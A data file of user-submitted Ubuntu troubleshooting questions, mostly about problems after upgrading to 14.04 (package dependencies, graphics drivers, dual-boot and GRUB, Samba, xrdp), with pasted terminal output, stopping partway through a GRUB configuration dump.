449743	how can i install the faenza icons for libreoffice on 14.04 ?	the question says it all . i had a working icon set on libreoffice 4.1 that got messed up due to an upgrade to 14.04 . how can i install my faenza icons again ?
449745	broken dependency after upgrading ubuntu 14.04	i recently upgraded to ubuntu 14.04 lts but few packages are broken . i tried to run the command apt-get -f install and dpkg -- configure -a but nothing worked for me . please help .. here is the output of command apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : samba-libs the following new packages will be installed : samba-libs 0 upgraded , 1 newly installed , 0 to remove and 612 not upgraded . 5 not fully installed or removed . need to get 0 b/4,101 kb of archives . after this operation , 18.3 mb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 267294 files and directories currently installed . ) preparing to unpack ... /samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb ... secrets.tdb exists in /var/lib/samba and /var/lib/samba/private , aborting samba-libs preinst rename one of them to allow the install/upgrade to continue http : //bugs.debian.org/726472 /var/lib/samba : total 2208 drwxr-xr-x 7 root root 4096 apr 18 16:57 . drwxr-xr-x 71 root root 4096 apr 18 16:56 .. -rw -- -- -- - 1 root root 421888 dec 11 11:30 account_policy.tdb -rw -- -- -- - 1 root root 696 dec 11 11:30 group_mapping.tdb drwxr-x -- - 2 root root 4096 apr 18 13:54 ntp_signd -rw -- -- -- - 1 root root 421888 jan 2 20:45 passdb.tdb drwxr-xr-x 6 root root 4096 apr 18 13:54 private -rw -- -- -- - 1 root root 528384 jan 2 20:02 registry.tdb -rw -- -- -- - 1 root root 430080 dec 11 11:30 secrets.tdb -rw -- -- -- - 1 root root 421888 mar 9 13:46 share_info.tdb drwxrwx -- -+ 3 root 3000000 4096 dec 26 17:27 sysvol drwxrwx -- t 2 root sambashare 4096 jan 2 20:28 usershares drwxr-x -- - 2 root root 4096 apr 18 13:54 winbindd_privileged /var/lib/samba/private : total 10904 drwxr-xr-x 6 root root 4096 apr 18 13:54 . drwxr-xr-x 7 root root 4096 apr 18 16:57 .. -rw-r -- r -- 1 root root 2270 dec 26 17:28 dns_update_list -rw -- -- -- - 1 root root 1286144 dec 26 17:27 hklm.ldb -rw -- -- -- - 1 root root 1286144 dec 26 17:27 idmap.ldb -rw-r -- r -- 1 root root 92 dec 26 17:28 krb5.conf srwxrwxrwx 1 root root 0 apr 18 13:54 ldapi drwxr-x -- - 2 root root 4096 apr 18 13:54 ldap_priv -r -- r -- r -- 1 root root 200 jan 2 20:48 named.conf.update -rw -- -- -- - 1 root root 1286144 dec 26 17:27 privilege.ldb -rw -- -- -- - 1 root root 696 dec 26 17:28 randseed.tdb -rw -- -- -- - 1 root root 4251648 dec 26 17:28 sam.ldb drwx -- -- -- 2 root root 4096 dec 26 17:27 sam.ldb.d -rw -- -- -- - 1 root root 696 apr 18 13:54 schannel_store.tdb -rw -- -- -- - 1 root root 1087 dec 26 17:28 secrets.keytab -rw -- -- -- - 1 root root 1286144 dec 26 17:28 secrets.ldb -rw -- -- -- - 1 root root 430080 dec 26 17:28 secrets.tdb -rw -- -- -- - 1 root root 1286144 dec 26 17:27 share.ldb drwxr-xr-x 3 root root 4096 dec 26 17:28 smbd.tmp -rw-r -- r -- 1 root root 955 dec 26 17:28 spn_update_list drwxr-xr-x 2 root root 4096 dec 26 17:28 tls dpkg : error processing archive /var/cache/apt/archives/samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
449748	a theme that has window colors like `` dash transparent blur '' on ubuntu 14.04	i 've been looking around for it , it 's beautiful in my opinion , i have n't been able to find anything . does something like it exist ? thanks in advance .
449751	system tray icons and dconf-editor in 14.04	in 12.04 i could use dconf-editor to edit the icons that were visible in the system tray as well as whitelist any applications that i wanted to be up there ( such as xchat , bomgar , shutter ) . this appears to be missing in 14.04 . is this something that needs to be updated in dconf-editor , or is there a workaround for this ? i appreciate any help .
449752	help with updating to from 13.10 to 14.04	when i run the following command : sudo apt-get update sudo apt-get dist-upgrade i just get this error : calculating upgrade ... failed the following packages have unmet dependencies : libcogl15 : breaks : libclutter-1.0-0 ( < 1.15 ) but 1.14.4-3 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i 'm really new to linux/ubuntu and i just ca n't figure out how to update libcogl15 . if i run the command sudo apt-get dist-upgrade then i get could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu see my /var/log/dist-upgrade/apt.log
449753	second screen is not properly recognized	[ ubuntu 14.04 64bit ] according to nvidia-settings i am currently using the intel gpu ( is there a way to verify that via command-line ? ) . > lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107glm [ quadro k2000m ] ( rev a1 ) > xrandr screen 0 : minimum 320 x 200 , current 2944 x 1080 , maximum 32767 x 32767 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 345mm x 194mm 1920x1080 59.9*+ [ ... ] 640x480 59.9 vga1 connected primary 1024x768+1920+312 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 virtual1 disconnected ( normal left inverted right x axis y axis ) dp-1-1 disconnected hdmi-1-1 disconnected vga1 is plugged in and works more or less - that means it functions as a second screen just that the resolution is very low ( it is 1024x768 ) and the ratio is not correct ( it is 4:3 ) . the ratio is actually the bigger issue because i mostly use my large external display for watching movies . apparently because the ratio is 4:3 instead of 16:9 in full screen mode large parts of the picture is missing . in the display settings the monitor is shown as `` unknown '' . what can i do ? i tried upgrading the driver but apparently it is already up-to-date : > sudo apt-get install xserver-xorg-video-intel [ sudo ] password for raffael : reading package lists ... done building dependency tree reading state information ... done xserver-xorg-video-intel is already the newest version .
449754	12.04 is overheating my compaq nc6320 laptop	i have been researching this all week , but i ca n't find a solution that seems to resolve this issue . i have just installed ubuntu 12.04 on my compaq nc6320 and it is running really hot and the fan just goes crazy for no reason ... it is definitely not due to a maintenance issue , ie . fan being dirty etc i 'm hoping that the fix will involve me using the terminal , and i can copy and paste it straight in as iâm not used to using ubuntu after moving away from windows . any suggestions would be much appreciated . many thanks clive
449756	erratic detection of usb keyboard and mouse	i just installed ubuntu 14.04 . during installation my keyboard ( razer blackwidow ultimate ) and my mouse ( raze deathadder , plugged on the usb port of the keyboard ) worked fine . i started my system for the first time , it told me some updates were necessary , i proceeded with them , restarted and then : before the loading screen , several screens of text about hdi-generic devices not working or not found were displayed and then , at the loading screen , keyobard and mouse were not working . they worked in bios , in grub and on my dual-boot windows7 but not in ubuntu , even in recovery mode . even stranger , as i tried , i remarked they sometimes work , if i plug them differently . how `` differently '' depends of the usb port : if i plug them on the front ports , they will always work , if i plug them on the back ports , they will work once out of ten times ( but then only if i plug them on different ports than those used the last time it did not work ... ) . other strange behaviour : if they work and i unplug then replug them : they wo n't work anymore . i have an old keyboard and an old mouse , they work perfectly . the problem is limited to razer hardware . each time i restart my computer i can tell if the keyboard and the mouse will work after grub simply by noticing if the screens of text about hdi-generic devices not working or not found are displayed or not .
449757	autogen.sh script failing with autoreconf2.50 : automake failed with exit status : 1	i recently heard about the maynard desktop , a replacement for lxde on the raspberry pi , and i really liked it . i was just planning on installing it on my pi , until i found out i could compile it for my pc , which i decided to do following the instructions here . however , i am getting an error that is preventing me from compiling when i run the autogen.sh script that came with the git clone . ./autogen.sh -- prefix $ prefix returns : ca n't exec `` libtoolize '' : no such file or directory at /usr/bin/autoreconf2.50 line 196 . use of uninitialized value in pattern match ( m// ) at /usr/bin/autoreconf2.50 line 196. autoreconf2.50 : entering directory ` . ' autoreconf2.50 : configure.ac : not using gettext autoreconf2.50 : running : aclocal -- force -i m4 $ { aclocal_flags } autoreconf2.50 : configure.ac : tracing autoreconf2.50 : configure.ac : not using libtool autoreconf2.50 : running : /usr/bin/autoconf -- force autoreconf2.50 : running : /usr/bin/autoheader -- force autoreconf2.50 : running : automake -- add-missing -- copy -- force-missing cursor/makefile.am:1 : libtool library used but `libtool ' is undefined cursor/makefile.am:1 : the usual way to define `libtool ' is to add `lt_init' cursor/makefile.am:1 : to `configure.ac ' and run `aclocal ' and `autoconf ' again . cursor/makefile.am:1 : if `lt_init ' is in `configure.ac ' , make sure cursor/makefile.am:1 : its definition is in aclocal 's search path . src/makefile.am:1 : libtool library used but `libtool ' is undefined src/makefile.am:1 : the usual way to define `libtool ' is to add `lt_init' src/makefile.am:1 : to `configure.ac ' and run `aclocal ' and `autoconf ' again . src/makefile.am:1 : if `lt_init ' is in `configure.ac ' , make sure src/makefile.am:1 : its definition is in aclocal 's search path . autoreconf2.50 : automake failed with exit status : 1 the autogen.sh script is this : # ! /bin/sh test -n `` $ srcdir '' || srcdir=`dirname `` $ 0 '' ` test -n `` $ srcdir '' || srcdir= . ( cd `` $ srcdir '' & & autoreconf -- force -v -- install ) || exit test -n `` $ noconfigure '' || `` $ srcdir/configure '' `` $ @ '' and the $ prefix variable is /home/nate/maynard-dev/_inst what is the issue and why is n't the autogen script working ? edit : the answer has got me past the original error , but i 'm now running into another . here 's the new complete output : autoreconf2.50 : entering directory ` . ' autoreconf2.50 : configure.ac : not using gettext autoreconf2.50 : running : aclocal -- force -i m4 $ { aclocal_flags } autoreconf2.50 : configure.ac : tracing autoreconf2.50 : running : libtoolize -- install -- copy -- force libtoolize : putting auxiliary files in `. ' . libtoolize : copying file `./config.guess' libtoolize : copying file `./config.sub' libtoolize : copying file `./install-sh' libtoolize : copying file `./ltmain.sh' libtoolize : putting macros in ac_config_macro_dir , `m4 ' . libtoolize : copying file `m4/libtool.m4' libtoolize : copying file `m4/ltoptions.m4' libtoolize : copying file `m4/ltsugar.m4' libtoolize : copying file `m4/ltversion.m4' libtoolize : copying file `m4/lt~obsolete.m4' autoreconf2.50 : running : /usr/bin/autoconf -- force autoreconf2.50 : running : /usr/bin/autoheader -- force autoreconf2.50 : running : automake -- add-missing -- copy -- force-missing autoreconf2.50 : leaving directory ` . ' checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking build system type ... powerpc-unknown-linux-gnu checking host system type ... powerpc-unknown-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert powerpc-unknown-linux-gnu file names to powerpc-unknown-linux-gnu format ... func_convert_file_noop checking how to convert powerpc-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes ./configure : line 11408 : syntax error near unexpected token `pkg_check_modules' ./configure : line 11408 : `pkg_check_modules ( ffi , libffi ) '
449760	amazon makes computer unresponsive	just installed 14.04 lts . did some updates . when i click on the amazon from the sidebar , it makes my computer unresponsive . i can still move my mouse , but that 's about it . i ca n't open , move , close anything . i 'm new to linux and i 'm not attached to the amazon `` app '' . just curious why it 's happening . is there a log i can look at ? i have to press my restart button on the pc itself just to get it up and running again .
449761	ubuntu 14.04 and vmware : can not install hgfs	i have patched official vmware tools with https : //github.com/rasa/vmware-tools-patches these patches were required to compile vmwqare tools under ubuntu 14.04 without compilation errors . than i listed shared folders and ran into error : ~ $ lsmod | grep hgfs vmhgfs 53979 1 vmw_vmci 62966 1 vmhgfs ~ $ vmware-hgfsclient myshare ~ $ ls -la /mnt/hgfs/ ls : can not access /mnt/hgfs/ : not a directory also i tried to mount it to different directory with similar result : ~ $ sudo mount -t vmhgfs .host : / ~/shares ~ $ ls -la ~/shares/ ls : can not access /home/ubuntu/shares/ : not a directory could you help me with this trouble ?
449762	ubuntu 14.04 live disk only starts up with acpi=off	i recently tried to run ubuntu 14.04 on a usb drive as i wanted to decide whether it is worth upgrading to ( my netbook now has 12.04 on it ) . however , when i tried to start ubuntu up from the usb drive , it did not start up as the screen was stuck on `` disabling irq # 9 '' . thereafter , through trial and error , i found out that it could start up after i enabled the `` acpi=off '' function . but , even though it starts up into the unity interface , it is stuck at a resolution of 800x600 ( my netbook monitor 's native resolution is 1024x600 ) and it is very laggy . there was no such problem when i used 12.04 on a usb drive . therefore , i have three questions : 1 ) why does my netbook always gets stuck at `` disabiling irq # 9 '' ? 2 ) what is acpi=off ? 3 ) how can i resolve the problem of the low resolution and very laggy gui on acpi=off function ? here is my netbook 's system infomation : nec versa n1100 netbook , intel atom n270 with 945gse express chipset , 1gb ram , 160gb hdd , ubuntu 12.04 dual boot with windows xp i would greatly appreciate your help regarding this issue , and thanks in advance : ) p.s . if you need more infomation to be able to help me solve this problem , please ask and also tell me how to get the info from my computer . thanks !
449763	can not install .sh file	i am new to ubuntu . i am trying to install a program . the `` readme.txt '' file says : to run program , write correct paths in the `` program.sh '' file ( path to the library `` ... /program/lib/ '' and to the executable file `` ... /program/program '' ) . and when i run program.sh it says : # ! /bin/sh kylix_bin= '' /home/ $ user/program/program/lib '' export ld_library_path= . : $ ld_library_path : $ kylix_bin /home/ $ user/program/program/program $ 1 ... where the string program is the name of the program i want to install . could you please help me to install the program ?
449764	low graphics mode on notebook	i have recently installed ubuntu 14.04 lts ( 64bit ) on my dell inspiron 3537 notebook and have problems which occurred when installed 13.10 ( 64bit ) too . originally ubuntu 12.04 lts was installed , it worked untill i tried to install the 13.04 . the problem is the low graphics mode . it is an freshly installed , and after the installion launched system and writes this mode which causes that i can not start the system . i tried many topics from this site and more from other sites , but no one was helpful . i am trying to install the vga driver as written in some topic ( ppa : ubuntu-x-swat/x-updates , intel hd graphics 4400 the screen and the hdmi is an adm radeon ) in console mode but i failed . no better idea to write here or stay at 12.04 . how could this problem be solved ? what should i do ? thank you for your assistence , david
449766	i 've lost control of all my settings on ubuntu	i 've been using ubuntu for the last three months . i had installed programs , and kept them on the launcher and used a wallpaper manager - variety . this morning when i opened my laptop , i found that all my programs from launcher were gone , variety did n't work anymore , and the only things that remained were the items on my desktop . i checked the trash , it had been emptied as well . as searched the directories , i found that all my data and programs were still there , but just all the settings on my machine had been reset to the way they were when i originally installed ubuntu . i change my settings back , although i can not get variety to work . when i boot my computer a second time , the settings reset again ! i try it again , and they reset again . moreover , i can not change my wallpaper , and while variety is running , it 's wallpapers are not being displayed . the original ubuntu wallpaper is still running over the rest . it was as if my system was in guest session . in a frantic attempt to get back control , i upgrade to ubuntu 14.04 which was released today , and the problem still persists . yesterday , all i did was install xchat , an irc client , the latest version of glib , it 's dependencies and perl . i do n't know what to do . please help . i 'm running vaio e-series if that helps .
449767	how to install ubuntu without usb or a disc	is there a way to install lubuntu 14.04 on a laptop with no boot from usb capability , a broken disc drive and running debian right now and the only way of transferring data to it being usb flash drives ?
449769	access samba share from other linux client	first of all , i 'm a long-time windows user and thought i should try something new . so be easy on me and pardon in ahead if i do n't get all that linux mumble-jumble ; ) so i installed a ubuntu server and started to create samba shares . i wanted one share public accessible without password and one share that required password . the password less share is all fine , but the password-protected share is not working as fine . when i try to browse the share from a windows client i get a login window and enter the username and password . that 's all working great , but when i try to access the same shared folder from a linux client and enter username and password it seems as it 's the wrong password . just keep getting the credentials windows thrown in my face . any ideas what could be wrong ? thanks in advance
449772	why do i not have a tahr wallpaper	i upgraded from 12.04 to 14.04 yesterday , and was surprised that the new included wallpapers do not contain any with a tahr in them . i had come to think of the cartoonish animal background as a fun indicator of the ubuntu version being run . does this not exist for 14.04 ?
449774	windows are going black when mini/maximizing	iâ´ve got 14.04 running perfectly on my desktop . there is however one slightly frustrating thing , which is that sometimes when i minimize a window , and then maximize it again the window is completely black . is there anyway to fix this ? i have an nvidia gtx 780 with the latest nvidia drivers . i hope somebody could help me resolve this issue . iâ´ve been having it since 12.10 .
449776	ubuntu screen can not be fully displayed using virtualbox	as you can see at the screen shoot below , there is a large blank space on my screen . the `` screen of ubuntu '' can not use all of the display area . this ubuntu is virtually installed using virtualbox . i 'm a new user . which means i ca n't embed image directly . so view the link below for the screenshoot . http : //postimg.org/image/cmttbyoe1/
449777	partitioning problem	i installed ubuntu with windows . i deleted two partitions to install ubuntu . after i installed ubuntu these drive still keep on showing in windows . what should i do so that these do not appear in windows
449778	glx not loading , the system is running in low-graphics mode '' error , ubuntu 14	i 've just installed ubuntu 14.04 on my lenovo g510 laptop . i made it to dual booth with a windows 8.1 . it has amd radeon hd8500 card . now when it boots i get the `` system is running in low-graphics mode '' and when i follow steps provided from other threads i get to `` loading extension glx `` message and the screen freezes . how can i fix this issue ?
449780	how to disable f1 for help in gnome ?	i often accidentally press f1 when in gnome which opens help center . quite irritating . i tried disabling it in key bindings but search through all the places they are stored in gnome according to https : //wiki.ubuntu.com/keybindings and failed to find an f1 binding for help . what have i missed ?
449781	packages have unmet dependencies while installing mysql ?	what is i got this error while installing mysql i enter these commands : sudo apt-get install mysql-server sudo apt-get install mysql-client the following packages have unmet dependencies : mysql-client : depends : mysql-client-5.5 but it is not going to be installed e : unable to correct problems , you have held broken packages .
449785	ubuntu 14.04 xrdp grey	i installed the latest ubuntu desktop and when i install xrdp i get a grey screen when i connect from windows rdc . this works fine in ubuntu 12.04 . i found several solutions but they are not really what i want . i would like for the ubuntu desktop to function with xrdp . any suggestions ? i have tried pretty much every post on xrdp `` grey screen '' . i was able to get the xfe desktop to work but i really want the ubuntu desktop to work . i did the following to install xrdp : sudo apt-get update sudo apt-get install xrdp restarted the ubuntu 14.04 desktop machine . rdc from windows results in a grey screen with an `` x '' cursor . the process of doing the update and installing xrdp works fine for ubuntu 12.04 desktop and i can get into the desktops via windows rdc just fine . but 14.04 desktop gives a greay screen .
449792	ubuntu 13.10 and 12.04.4 installer not seeing partitions	i am trying to install ubuntu 64 bit on a lenovo g500s machine . i have tried installing both 13.10 and 12.04.4 and i am having the same problem with both versions . when i get to the installation process in the ubuntu menu , the hard drive is seen as completely unallocated . i have partitioned the hard drive using windows partition manager . i would include a screen shot , but apparently i ca n't b/c i am new to the forums . so , windows partition manager sees the drive as follows , disk 0 - 931.51 gb system reserved 100 mb ntfs ( healthy , primary partition ) c : ) 488.18 gb ntfs ( healthy , primary partition ) unallocated 443.23 gb . when in the ubuntu installer , i ran sudo fdisk -l and this was the output . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical /physical ) : 512 bytes / 4098 bytes i/o size ( minimum/optimal ) : 4096 bytes/ 4096 bytes disk identifier : 0xc0bbb31d device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda 2 206848 1024002047 511897600 7 hpfs/ntfs/exfat any fixes that people can recommend to get the ubuntu installer to see my partitions would be greatly appreciated ! i am happy to answer any questions !
449793	alt key for hud conflict	i have just installed ubuntu 14.04 , and encountered a weird problem when i am using google-chrome , i use alt+d to go to the address bar and type a url . however , every times i press alt , ubuntu hud will pop up and block my chrome . so i need to press alt again to get rid of it . p.s . i do not have the problems using ubuntu 13.10
449794	dual-boot windows 7 and 14.04 but windows not booting	using a macbookpro . mac os hfs partition was corrupted so formatted the partition and installed ubuntu on top of that . i 've been using boot repair to get this thing working . i can not load grub ; however , i do have refind loading up during startup . when i press option while booting up , i start windows however it gets stuck at the screen before the windows logo . it constantly blinks `` _ '' . i would greatly appreciate any help and i am willing to give more info if i can . i am greatly avoiding a full drive format in order to fix this problem . /dev/sdb , i assume is my secondary hard drive ( i swapped my superdrive for a hard drive ) , however , no operating system is installed here . it is primarily a storage device . boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 52977664 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . = > windows is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : according to the info in the boot sector , sda1 starts at sector 0 . but according to the info from fdisk , sda1 starts at sector 40 . operating system : boot files : /efi/refind/refind_x64.efi /efi/ubuntu/grubx64.efi /efi/ubuntu/mokmanager.efi /efi/ubuntu/shimx64.efi sda2 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda2 and looks at sector 34582112 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . operating system : ubuntu 14.04 lts boot files : /boot/grub/grub.cfg /etc/fstab sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 409,639 409,639 ee gpt /dev/sda2 409,640 52,977,663 52,568,024 83 linux /dev/sda3 * 59,267,072 500,117,503 440,850,432 7 ntfs / exfat / hpfs /dev/sda4 52,977,664 52,981,759 4,096 83 linux guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 40 409,639 409,600 efi system partition /dev/sda2 409,640 52,977,663 52,568,024 data partition ( windows/linux ) /dev/sda3 59,267,072 500,117,503 440,850,432 data partition ( windows/linux ) /dev/sda4 52,977,664 52,981,759 4,096 bios boot partition drive : sdb _____________________________________________________________________ disk /dev/sdb : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 234,438,655 234,436,608 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 70d6-1701 vfat efi /dev/sda2 6c529c8d-4150-41e0-b289-382362058948 ext4 /dev/sda3 0a8619ca8619b6e3 ntfs bootcamp /dev/sda4 53be24cd-9737-49c6-ac61-eca913db3fda ext2 /dev/sdb1 441ce71c1ce707ae ntfs 120_toshiba_gb_ps3 ================================ mount points : ================================= device mount_point type options /dev/sda1 /mnt/boot-sav/sda1 vfat ( rw ) /dev/sda2 / ext4 ( rw , errors=remount-ro ) /dev/sda3 /media/jmbp/bootcamp fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda4 /mnt/boot-sav/sda4 ext2 ( rw ) /dev/sdb1 /mnt/boot-sav/sdb1 fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) =========================== sda2/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 6c529c8d-4150-41e0-b289-382362058948 else search -- no-floppy -- fs-uuid -- set=root 6c529c8d-4150-41e0-b289-382362058948 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=10 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=10 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-6c529c8d-4150-41e0-b289-382362058948 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 6c529c8d-4150-41e0-b289-382362058948 else search -- no-floppy -- fs-uuid -- set=root 6c529c8d-4150-41e0-b289-382362058948 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=6c529c8d-4150-41e0-b289-382362058948 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-6c529c8d-4150-41e0-b289-382362058948 ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-6c529c8d-4150-41e0-b289-382362058948 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 6c529c8d-4150-41e0-b289-382362058948 else search -- no-floppy -- fs-uuid -- set=root 6c529c8d-4150-41e0-b289-382362058948 fi echo 'loading linux 3.13.0-24-generic ... ' linux 